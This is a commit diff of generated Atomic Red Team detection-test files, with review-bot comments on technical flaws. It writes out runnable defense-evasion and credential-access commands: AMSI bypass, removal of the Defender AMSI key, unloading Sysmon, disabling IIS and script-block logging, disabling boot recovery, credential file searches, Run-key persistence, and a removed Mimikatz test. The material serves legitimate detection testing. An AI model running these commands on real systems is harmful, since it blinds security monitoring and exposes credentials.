Generate docs from job=validate_atomics_generate_docs branch=master

This commit is contained in:
CircleCI Atomic Red Team doc generator
2019-12-10 18:19:40 +00:00
parent 0c5bcef840
commit fbda422009
9 changed files with 127 additions and 130 deletions
+6 -25
@@ -14,11 +14,9 @@ In cloud environments, authenticated user credentials are often stored in local
- [Atomic Test #2 - Extract passwords with grep](#atomic-test-2---extract-passwords-with-grep)
- [Atomic Test #3 - Runs Mimikatz & Mimikittenz by name](#atomic-test-3---runs-mimikatz--mimikittenz-by-name)
- [Atomic Test #3 - Extracting passwords with findstr](#atomic-test-3---extracting-passwords-with-findstr)
- [Atomic Test #4 - Extracting passwords with findstr](#atomic-test-4---extracting-passwords-with-findstr)
- [Atomic Test #5 - Access "unattend.xml"](#atomic-test-5---access-unattendxml)
- [Atomic Test #4 - Access unattend.xml](#atomic-test-4---access-unattendxml)
<br/>
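Review bot: removing the Mimikatz entry renumbers the two tests after it (#4 becomes #3, #5 becomes #4), so anyone who invokes T1081 atomics by test number, or whose detection notes reference "Atomic Test #5 - Access unattend.xml", now points at a different test; the generated index files in this same commit are the only record of that renumbering, so it deserves a line in the commit message or changelog.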
@@ -60,24 +58,7 @@ grep -ri password #{file_path}
<br/>
<br/>
## Atomic Test #3 - Runs Mimikatz & Mimikittenz by name
Mimikatz/kittenz - This will require a Mimikatz executable or invoke-mimikittenz ps module.
**Supported Platforms:** Windows
#### Run it with `powershell`! Elevation Required (e.g. root or admin)
```
invoke-mimikittenz
mimikatz.exe
```
<br/>
<br/>
## Atomic Test #4 - Extracting passwords with findstr
## Atomic Test #3 - Extracting passwords with findstr
Extracting Credentials from Files
**Supported Platforms:** Windows
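Review bot: the removed test had no prerequisite check and simply ran `invoke-mimikittenz` and `mimikatz.exe` by name, so it could only succeed when an operator had already staged those tools on the PATH; dropping it is reasonable, and the heading rename from #4 to #3 that follows only makes sense together with the index update later in this commit, so the two must stay in the same commit.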
@@ -94,7 +75,7 @@ ls -R | select-string -Pattern password
<br/>
<br/>
## Atomic Test #5 - Access "unattend.xml"
## Atomic Test #4 - Access unattend.xml
Attempts to access unattend.xml, where credentials are commonly stored, within the Panther directory where installation logs are stored.
**Supported Platforms:** Windows
@@ -102,8 +83,8 @@ Attempts to access unattend.xml, where credentials are commonly stored, within t
#### Run it with `command_prompt`! Elevation Required (e.g. root or admin)
```
cmd /c type C:\Windows\Panther\unattend.xml > nul 2>&1
cmd /c type C:\Windows\Panther\Unattend\unattend.xml > nul 2>&1
type C:\Windows\Panther\unattend.xml > nul 2>&1
type C:\Windows\Panther\Unattend\unattend.xml > nul 2>&1
```
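Review bot: dropping the `cmd /c` prefix is correct because the `command_prompt` executor already runs inside cmd.exe, but `> nul 2>&1` discards both the file contents and any error, so a run where neither path exists looks identical to a successful read. For the detection purpose of this test, a plain `type` of unattend.xml produces no Sysmon event (Sysmon does not log file reads), so validating coverage requires file-read auditing (a SACL on the Panther files yielding Security event 4663) or EDR file-access telemetry; that caveat belongs in the description.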
-1
@@ -122,7 +122,6 @@ $url='https://raw.githubusercontent.com/mattifestation/PowerSploit/master/Exfilt
## Atomic Test #5 - Invoke-AppPathBypass
Note: Windows 10 only
Bypass is based on: https://enigma0x3.net/2017/03/14/bypassing-uac-using-app-paths/
**Supported Platforms:** Windows
+16 -8
@@ -173,7 +173,7 @@ sudo launchctl unload /Library/LaunchDaemons/com.opendns.osx.RoamingClientConfig
<br/>
## Atomic Test #8 - Unload Sysmon Filter Driver
Unloads the Sysinternals Sysmon filter driver without stopping the Sysmon service.
Unloads the Sysinternals Sysmon filter driver without stopping the Sysmon service.
**Supported Platforms:** Windows
@@ -204,7 +204,7 @@ sc start sysmon
<br/>
## Atomic Test #9 - Disable Windows IIS HTTP Logging
Disables HTTP logging on a Windows IIS web server as seen by Threat Group 3390 (Bronze Union).
Disables HTTP logging on a Windows IIS web server as seen by Threat Group 3390 (Bronze Union).
This action requires HTTP logging configurations in IIS to be unlocked.
**Supported Platforms:** Windows
@@ -215,12 +215,20 @@ This action requires HTTP logging configurations in IIS to be unlocked.
|------|-------------|------|---------------|
| website_name | The name of the website on a server | string | Default Web Site|
#### Run it with `command_prompt`!
#### Run it with `powershell`!
```
C:\Windows\System32\inetsrv\appcmd.exe set config "#{website_name}" /section:httplogging /dontLog:true
```
#### Commands to Check Prerequisites:
```
if(Test-Path C:\Windows\System32\inetsrv\appcmd.exe) {0} else {1}
```
#### Cleanup Commands:
```
C:\Windows\System32\inetsrv\appcmd.exe set config "#{website_name}" /section:httplogging /dontLog:false
```
<br/>
<br/>
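Review bot: the new prerequisite `if(Test-Path C:\Windows\System32\inetsrv\appcmd.exe) {0} else {1}` writes 0 or 1 to the pipeline rather than setting an exit code, so a runner that decides on `$LASTEXITCODE` sees success even when appcmd.exe is missing; `exit 1` in the else branch (and `exit 0` otherwise) works under either convention. The executor switch from `command_prompt` to `powershell` is what makes the `Test-Path` check possible, and the added cleanup correctly restores `/dontLog:false`, but neither change is mentioned in the surrounding description.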
@@ -250,7 +258,7 @@ sysmon -i -accepteula
<br/>
## Atomic Test #11 - AMSI Bypass - AMSI InitFailed
Any easy way to bypass AMSI inspection is it patch the dll in memory setting the "amsiInitFailed" function to true.
Any easy way to bypass AMSI inspection is it patch the dll in memory setting the "amsiInitFailed" function to true.
https://www.mdsec.co.uk/2018/06/exploring-powershell-amsi-and-logging-evasion/
**Supported Platforms:** Windows
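Review bot: the description still reads "Any easy way to bypass AMSI inspection is it patch the dll", which should be "An easy way ... is to patch the DLL", and `amsiInitFailed` is a static field (the command later in this commit reads it with `GetField`), not a function; since this markdown is generated, the fix belongs in the atomic's source YAML rather than here.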
@@ -272,7 +280,7 @@ https://www.mdsec.co.uk/2018/06/exploring-powershell-amsi-and-logging-evasion/
## Atomic Test #12 - AMSI Bypass - Remove AMSI Provider Reg Key
With administrative rights, an adversary can remove the AMSI Provider registry key in HKLM\Software\Microsoft\AMSI to disable AMSI inspection.
This test removes the Windows Defender provider registry key.
This test removes the Windows Defender provider registry key.
**Supported Platforms:** Windows
@@ -292,7 +300,7 @@ New-Item -Path "HKLM:\SOFTWARE\Microsoft\AMSI\Providers" -Name "{2781761E-28E0-4
<br/>
## Atomic Test #13 - Disable Arbitrary Security Windows Service
With administrative rights, an adversary can disable Windows Services related to security products.
With administrative rights, an adversary can disable Windows Services related to security products.
**Supported Platforms:** Windows
@@ -319,7 +327,7 @@ net.exe start #{service_name}
<br/>
## Atomic Test #14 - Disable PowerShell Script Block Logging
An adversary may disable PowerShell Script Block Logging to avoid leaving evidence.
An adversary may disable PowerShell Script Block Logging to avoid leaving evidence.
Credit to Matt Graeber (@mattifestation) for the research.
@@ -347,7 +355,7 @@ $GroupPolicySettings['ScriptBlockLogging']['EnableScriptBlockInvocationLogging']
<br/>
## Atomic Test #15 - PowerShell Bypass of AntiMalware Scripting Interface
An adversary may bypass Windows Defender AMSI to execute malicious PowerShell code.
An adversary may bypass Windows Defender AMSI to execute malicious PowerShell code.
Credit to Matt Graeber (@mattifestation) for the research.
+4
@@ -31,5 +31,9 @@ xcopy #{web_shells} #{web_shell_path}
```
#### Cleanup Commands:
```
del #{web_shell_path}
```
<br/>
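Review bot: the new cleanup `del #{web_shell_path}` prompts "Are you sure (Y/N)?" and stalls a non-interactive run if `web_shell_path` is a directory (which the `xcopy #{web_shells} #{web_shell_path}` in the hunk header suggests), and it leaves read-only files in place; use `del /f /q` for a file target or `rmdir /s /q` for a directory, matching the `/f` and `/s /q` flags the T1107 tests in this same commit use.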
+10 -21
@@ -104,14 +104,10 @@ Delete a single file from the temporary directory using cmd.exe
**Supported Platforms:** Windows
#### Inputs
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| file_to_delete | Path of file to delete | Path | C:\Windows\Temp\victim-files-cmd\a|
#### Run it with `command_prompt`!
```
del /f #{file_to_delete}
echo "T1107" > %temp%\T1107.txt
del /f %temp%\T1107.txt
```
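Review bot: creating `%temp%\T1107.txt` before deleting it makes the test self-contained, and dropping the `file_to_delete` input removes a default path that only existed if an operator had pre-staged it; one caveat worth a line in the description is that `%temp%` resolves to `C:\Windows\Temp` when the runner executes as SYSTEM and to the user's local AppData Temp otherwise, so detection rules built from this test should not key on either path alone.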
@@ -125,14 +121,10 @@ Recursively delete the temporary directory and all files contained within it usi
**Supported Platforms:** Windows
#### Inputs
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| folder_to_delete | Path of folder to delete | Path | C:\Windows\Temp\victim-files-cmd|
#### Run it with `command_prompt`!
```
del /f /S #{folder_to_delete}
mkdir %temp%\T1107
rmdir /s /q %temp%\T1107
```
@@ -146,14 +138,10 @@ Delete a single file from the temporary directory using Powershell
**Supported Platforms:** Windows
#### Inputs
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| file_to_delete | Path of file to delete | Path | C:\Windows\Temp\victim-files-ps\a|
#### Run it with `powershell`!
```
Remove-Item -path "#{file_to_delete}"
New-Item $env:TEMP\T1107.txt
Remove-Item -path $env:TEMP\T1107.txt
```
@@ -174,7 +162,8 @@ Recursively delete the temporary directory and all files contained within it usi
#### Run it with `powershell`!
```
Remove-Item -path "#{folder_to_delete}" -recurse
New-Item $env:TEMP\T1107 -ItemType Directory
Remove-Item -path $env:TEMP\T1107 -recurse
```
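Review bot: `New-Item $env:TEMP\T1107 -ItemType Directory` (and `New-Item $env:TEMP\T1107.txt` in the previous hunk) throws if the item already exists, for example after an interrupted earlier run, and then the `Remove-Item` never executes; add `-Force` to both `New-Item` calls so the tests are idempotent.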
@@ -220,7 +209,7 @@ This test leverages `bcdedit` to remove boot-time recovery measures.
**Supported Platforms:** Windows
#### Run it with `command_prompt`!
#### Run it with `command_prompt`! Elevation Required (e.g. root or admin)
```
bcdedit /set {default} bootstatuspolicy ignoreallfailures
bcdedit /set {default} recoveryenabled no
@@ -232,7 +221,7 @@ bcdedit /set {default} recoveryenabled no
<br/>
## Atomic Test #11 - wbadmin
This test deletes Windows Backup catalogs.
This test deletes Windows Backup catalogs.
**Supported Platforms:** Windows
+10 -2
@@ -29,12 +29,16 @@ Modify the registry of the currently logged in user using reg.exe cia cmd consol
**Supported Platforms:** Windows
#### Run it with `command_prompt`!
#### Run it with `command_prompt`! Elevation Required (e.g. root or admin)
```
reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /t REG_DWORD /v HideFileExt /d 1 /f
```
#### Cleanup Commands:
```
reg delete HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /v HideFileExt /f
```
<br/>
<br/>
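Review bot: "Elevation Required" is wrong for this hunk: writing `HideFileExt` under `HKEY_CURRENT_USER` needs no admin rights, and if the runner honours the flag by launching an elevated session as a different account, the value lands in that account's hive rather than the hive of "the currently logged in user" the header describes; keep `elevation_required: false` for the HKCU test (the HKLM Run-key test below is the one that needs elevation). The added `reg delete` cleanup is correct. Separately, the header text "using reg.exe cia cmd consol" should read "via cmd console" in the source atomic.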
@@ -52,6 +56,10 @@ reg add HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run /t REG_
```
#### Cleanup Commands:
```
reg delete HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run /v SecurityHealth /f
```
<br/>
<br/>
@@ -124,7 +132,7 @@ reg unload "HKU\$($ProfileList[$p].SID)"
<br/>
## Atomic Test #4 - Modify registry to store logon credentials
Sets registry key that will tell windows to store plaintext passwords (making the system vulnerable to clear text / cleartext password dumping)
Sets registry key that will tell windows to store plaintext passwords (making the system vulnerable to clear text / cleartext password dumping)
**Supported Platforms:** Windows
+2 -3
@@ -661,9 +661,8 @@
- [T1081 Credentials in Files](./T1081/T1081.md)
- Atomic Test #1: Extract Browser and System credentials with LaZagne [macos]
- Atomic Test #2: Extract passwords with grep [macos, linux]
- Atomic Test #3: Runs Mimikatz & Mimikittenz by name [windows]
- Atomic Test #4: Extracting passwords with findstr [windows]
- Atomic Test #5: Access "unattend.xml" [windows]
- Atomic Test #3: Extracting passwords with findstr [windows]
- Atomic Test #4: Access unattend.xml [windows]
- [T1214 Credentials in Registry](./T1214/T1214.md)
- Atomic Test #1: Enumeration for Credentials in Registry [windows]
- T1212 Exploitation for Credential Access [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+77 -67
@@ -4992,6 +4992,9 @@ persistence:
name: command_prompt
command: 'xcopy #{web_shells} #{web_shell_path}
'
cleanup_command: 'del #{web_shell_path}
'
T1084:
technique:
@@ -7102,8 +7105,10 @@ defense-evasion:
'
- name: Unload Sysmon Filter Driver
description: "Unloads the Sysinternals Sysmon filter driver without stopping
the Sysmon service. \n"
description: 'Unloads the Sysinternals Sysmon filter driver without stopping
the Sysmon service.
'
supported_platforms:
- windows
input_arguments:
@@ -7126,9 +7131,9 @@ defense-evasion:
fltmc.exe load #{sysmon_driver}
sc start sysmon
- name: Disable Windows IIS HTTP Logging
description: "Disables HTTP logging on a Windows IIS web server as seen by Threat
Group 3390 (Bronze Union). \nThis action requires HTTP logging configurations
in IIS to be unlocked.\n"
description: |
Disables HTTP logging on a Windows IIS web server as seen by Threat Group 3390 (Bronze Union).
This action requires HTTP logging configurations in IIS to be unlocked.
supported_platforms:
- windows
input_arguments:
@@ -7137,10 +7142,18 @@ defense-evasion:
type: string
default: Default Web Site
executor:
name: command_prompt
name: powershell
prereq_command: 'if(Test-Path C:\Windows\System32\inetsrv\appcmd.exe) {0}
else {1}
'
command: 'C:\Windows\System32\inetsrv\appcmd.exe set config "#{website_name}"
/section:httplogging /dontLog:true
'
cleanup_command: 'C:\Windows\System32\inetsrv\appcmd.exe set config "#{website_name}"
/section:httplogging /dontLog:false
'
- name: Uninstall Sysmon
description: 'Uninstall Sysinternals Sysmon for Defense Evasion
@@ -7161,8 +7174,9 @@ defense-evasion:
'
- name: AMSI Bypass - AMSI InitFailed
description: "Any easy way to bypass AMSI inspection is it patch the dll in
memory setting the \"amsiInitFailed\" function to true. \nhttps://www.mdsec.co.uk/2018/06/exploring-powershell-amsi-and-logging-evasion/\n"
description: |
Any easy way to bypass AMSI inspection is it patch the dll in memory setting the "amsiInitFailed" function to true.
https://www.mdsec.co.uk/2018/06/exploring-powershell-amsi-and-logging-evasion/
supported_platforms:
- windows
executor:
@@ -7171,9 +7185,9 @@ defense-evasion:
command: "[Ref].Assembly.GetType('System.Management.Automation.AmsiUtils').GetField('amsiInitFailed','NonPublic,Static').SetValue($null,$true)\n"
cleanup_command: "[Ref].Assembly.GetType('System.Management.Automation.AmsiUtils').GetField('amsiInitFailed','NonPublic,Static').SetValue($null,$false)\n"
- name: AMSI Bypass - Remove AMSI Provider Reg Key
description: "With administrative rights, an adversary can remove the AMSI Provider
registry key in HKLM\\Software\\Microsoft\\AMSI to disable AMSI inspection.\nThis
test removes the Windows Defender provider registry key. \n"
description: |
With administrative rights, an adversary can remove the AMSI Provider registry key in HKLM\Software\Microsoft\AMSI to disable AMSI inspection.
This test removes the Windows Defender provider registry key.
supported_platforms:
- windows
executor:
@@ -7188,8 +7202,10 @@ defense-evasion:
'
- name: Disable Arbitrary Security Windows Service
description: "With administrative rights, an adversary can disable Windows Services
related to security products. \n"
description: 'With administrative rights, an adversary can disable Windows Services
related to security products.
'
supported_platforms:
- windows
input_arguments:
@@ -7207,8 +7223,10 @@ defense-evasion:
sc.exe config #{service_name} start= auto
net.exe start #{service_name}
- name: Disable PowerShell Script Block Logging
description: "An adversary may disable PowerShell Script Block Logging to avoid
leaving evidence. \n\nCredit to Matt Graeber (@mattifestation) for the research.\n"
description: |
An adversary may disable PowerShell Script Block Logging to avoid leaving evidence.
Credit to Matt Graeber (@mattifestation) for the research.
supported_platforms:
- windows
executor:
@@ -7225,14 +7243,18 @@ defense-evasion:
$GroupPolicySettings['ScriptBlockLogging']['EnableScriptBlockLogging'] = 1
$GroupPolicySettings['ScriptBlockLogging']['EnableScriptBlockInvocationLogging'] = 1
- name: PowerShell Bypass of AntiMalware Scripting Interface
description: "An adversary may bypass Windows Defender AMSI to execute malicious
PowerShell code. \n\nCredit to Matt Graeber (@mattifestation) for the research.\n"
description: |
An adversary may bypass Windows Defender AMSI to execute malicious PowerShell code.
Credit to Matt Graeber (@mattifestation) for the research.
supported_platforms:
- windows
executor:
name: powershell
elevation_required: false
command: '[Ref].Assembly.GetType("System.Management.Automation.AmsiUtils").GetField(''amsiInitFailed'',''NonPublic,Static'').SetValue($null,$true)'
command: '[Ref].Assembly.GetType("System.Management.Automation.AmsiUtils").GetField(''amsiInitFailed'',''NonPublic,Static'').SetValue($null,$true)
'
T1107:
technique:
x_mitre_data_sources:
@@ -7343,17 +7365,12 @@ defense-evasion:
'
supported_platforms:
- windows
input_arguments:
file_to_delete:
description: Path of file to delete
type: Path
default: C:\Windows\Temp\victim-files-cmd\a
executor:
name: command_prompt
elevation_required: false
command: 'del /f #{file_to_delete}
'
command: |
echo "T1107" > %temp%\T1107.txt
del /f %temp%\T1107.txt
- name: Delete an entire folder - Windows cmd
description: 'Recursively delete the temporary directory and all files contained
within it using cmd.exe
@@ -7361,34 +7378,24 @@ defense-evasion:
'
supported_platforms:
- windows
input_arguments:
folder_to_delete:
description: Path of folder to delete
type: Path
default: C:\Windows\Temp\victim-files-cmd
executor:
name: command_prompt
elevation_required: false
command: 'del /f /S #{folder_to_delete}
'
command: |
mkdir %temp%\T1107
rmdir /s /q %temp%\T1107
- name: Delete a single file - Windows PowerShell
description: 'Delete a single file from the temporary directory using Powershell
'
supported_platforms:
- windows
input_arguments:
file_to_delete:
description: Path of file to delete
type: Path
default: C:\Windows\Temp\victim-files-ps\a
executor:
name: powershell
elevation_required: false
command: 'Remove-Item -path "#{file_to_delete}"
'
command: |
New-Item $env:TEMP\T1107.txt
Remove-Item -path $env:TEMP\T1107.txt
- name: Delete an entire folder - Windows PowerShell
description: 'Recursively delete the temporary directory and all files contained
within it using Powershell
@@ -7404,9 +7411,9 @@ defense-evasion:
executor:
name: powershell
elevation_required: false
command: 'Remove-Item -path "#{folder_to_delete}" -recurse
'
command: |
New-Item $env:TEMP\T1107 -ItemType Directory
Remove-Item -path $env:TEMP\T1107 -recurse
- name: Delete VSS - vssadmin
description: 'Delete all volume shadow copies with vssadmin.exe
@@ -7439,11 +7446,14 @@ defense-evasion:
- windows
executor:
name: command_prompt
elevation_required: true
command: |
bcdedit /set {default} bootstatuspolicy ignoreallfailures
bcdedit /set {default} recoveryenabled no
- name: wbadmin
description: "This test deletes Windows Backup catalogs. \n"
description: 'This test deletes Windows Backup catalogs.
'
supported_platforms:
- windows
executor:
@@ -9488,10 +9498,14 @@ defense-evasion:
- windows
executor:
name: command_prompt
elevation_required: false
elevation_required: true
command: 'reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced
/t REG_DWORD /v HideFileExt /d 1 /f
'
cleanup_command: 'reg delete HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced
/v HideFileExt /f
'
- name: Modify Registry of Local Machine - cmd
description: |
@@ -9505,6 +9519,10 @@ defense-evasion:
command: 'reg add HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run
/t REG_EXPAND_SZ /v SecurityHealth /d {some_other_executable} /f
'
cleanup_command: 'reg delete HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run
/v SecurityHealth /f
'
- name: Modify Registry of Another User Profile
description: 'Modify a registry key of each user profile not currently loaded
@@ -9570,9 +9588,10 @@ defense-evasion:
[gc]::Collect()
reg unload "HKU\$($ProfileList[$p].SID)"
- name: Modify registry to store logon credentials
description: "Sets registry key that will tell windows to store plaintext passwords
description: 'Sets registry key that will tell windows to store plaintext passwords
(making the system vulnerable to clear text / cleartext password dumping)
\n"
'
supported_platforms:
- windows
executor:
@@ -9616,7 +9635,9 @@ defense-evasion:
$EncodedCommand
Set-ItemProperty -Force -Path #{registry_key_storage} -Name #{registry_entry_storage} -Value $EncodedCommand
cleanup_command: 'Remove-ItemProperty -Force -Path -Path #{registry_key_storage}
-Name #{registry_entry_storage}'
-Name #{registry_entry_storage}
'
T1170:
technique:
x_mitre_data_sources:
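Review bot: the unchanged `cleanup_command` in this hunk carries a duplicated switch, `Remove-ItemProperty -Force -Path -Path #{registry_key_storage}`, which PowerShell rejects (the second `-Path` is parsed as a parameter name with no argument), so cleanup of the stored encoded command never runs; this file is generated, so correct it in the source atomic.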
@@ -14943,6 +14964,9 @@ privilege-escalation:
name: command_prompt
command: 'xcopy #{web_shells} #{web_shell_path}
'
cleanup_command: 'del #{web_shell_path}
'
impact:
T1531:
@@ -19261,19 +19285,6 @@ credential-access:
command: 'grep -ri password #{file_path}
'
- name: Runs Mimikatz & Mimikittenz by name
description: 'Mimikatz/kittenz - This will require a Mimikatz executable or
invoke-mimikittenz ps module.
'
supported_platforms:
- windows
executor:
name: powershell
elevation_required: true
command: |
invoke-mimikittenz
mimikatz.exe
- name: Extracting passwords with findstr
description: 'Extracting Credentials from Files
@@ -19286,7 +19297,7 @@ credential-access:
command: |
findstr /si pass *.xml | *.doc | *.txt | *.xls
ls -R | select-string -Pattern password
- name: Access "unattend.xml"
- name: Access unattend.xml
description: 'Attempts to access unattend.xml, where credentials are commonly
stored, within the Panther directory where installation logs are stored.
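Review bot: the context line `findstr /si pass *.xml | *.doc | *.txt | *.xls` pipes findstr's output into `*.doc` as a command instead of searching those file types, so the test only ever searches XML files and cmd reports `*.doc` as not recognized; the intended form is `findstr /si pass *.xml *.doc *.txt *.xls`. Not touched by this hunk, but it should be fixed in the source atomic.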
@@ -19297,8 +19308,8 @@ credential-access:
name: command_prompt
elevation_required: true
command: |
cmd /c type C:\Windows\Panther\unattend.xml > nul 2>&1
cmd /c type C:\Windows\Panther\Unattend\unattend.xml > nul 2>&1
type C:\Windows\Panther\unattend.xml > nul 2>&1
type C:\Windows\Panther\Unattend\unattend.xml > nul 2>&1
T1214:
technique:
x_mitre_permissions_required:
@@ -21416,7 +21427,6 @@ execution:
- name: Invoke-AppPathBypass
description: |
Note: Windows 10 only
Bypass is based on: https://enigma0x3.net/2017/03/14/bypassing-uac-using-app-paths/
supported_platforms:
- windows
+2 -3
@@ -473,9 +473,8 @@
- Atomic Test #12: GPP Passwords (Get-GPPPassword) [windows]
- T1503 Credentials from Web Browsers [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1081 Credentials in Files](./T1081/T1081.md)
- Atomic Test #3: Runs Mimikatz & Mimikittenz by name [windows]
- Atomic Test #4: Extracting passwords with findstr [windows]
- Atomic Test #5: Access "unattend.xml" [windows]
- Atomic Test #3: Extracting passwords with findstr [windows]
- Atomic Test #4: Access unattend.xml [windows]
- [T1214 Credentials in Registry](./T1214/T1214.md)
- Atomic Test #1: Enumeration for Credentials in Registry [windows]
- T1212 Exploitation for Credential Access [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)